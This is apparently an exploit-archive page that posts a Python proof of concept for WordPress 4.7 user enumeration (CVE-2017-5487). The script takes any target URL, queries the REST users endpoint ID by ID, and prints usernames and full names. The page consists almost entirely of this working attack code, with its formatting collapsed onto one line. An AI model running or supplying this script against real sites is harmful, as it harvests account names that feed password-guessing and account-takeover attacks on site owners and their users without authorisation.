Home / os / solaris

Wordpress >=4.7 User Enumeration Exploit

Posted on 30 November -0001

<HTML><HEAD><TITLE>Wordpress >=4.7 User Enumeration Exploit</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>import requests import json print "#############################################################" print "tWordpress 4.7 User Enumeration PoC (CVE 2017-5487) tttWPVDB ID: 8715 tttBy Alienwithin" print "############################################################# " targetSite = raw_input("Please enter the URL to target e.g. http://target.com : Site URL: ") NumberOfUsers = raw_input("Please enter the number of users to retrieve e.g. 10 ") print "ID || Username || Full Name " for users in range(1, int(NumberOfUsers)): req = requests.get(targetSite+'/wp-json/wp/v2/users/'+str(users)) target_info_parsed = json.loads(req.text) if 'id' not in target_info_parsed: print "No user with ID :" + str(users) req.close() else: target_id = target_info_parsed['id'] target_name = target_info_parsed['name'] target_username = target_info_parsed['slug'] print str(target_id)+ " || "+ str(target_username) + " || "+ str(target_name)+" " req.close() </BODY></HTML>

 

TOP